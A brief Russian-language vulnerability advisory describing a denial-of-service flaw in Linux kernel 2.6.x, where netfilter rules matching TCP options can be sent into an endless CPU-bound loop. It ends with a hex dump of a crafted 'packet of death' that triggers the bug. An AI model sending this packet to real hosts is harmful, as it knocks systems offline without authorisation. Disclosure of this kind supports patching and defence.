Программа: Linux kernel 2.6.x
Уязвимость в Linux kernel 2.6 в обработке TCP опций позволяет удаленному пользователю вызвать отказ в
обслуживании. Уязвимость обнаружена в netfilter подсистеме, когда используются правила, соответствующие TCP опциям (т.е.
- tcp-option). Удаленный пользователь может послать специально обработанный пакет к хосту жертвы, чтобы заставить ядро войти в бесконечный цикл со 100% использованием CPU.
Пример пакета “смерти”:
0x0000:4500 0030 1234 4000 ff06 e83f c0a8 0001
0x0010:c0a8 0002 0400 1000 0000 0064 0000 0064
0x0020:7000 0fa0 dc6a 0000 0204 05b4 0101 04fd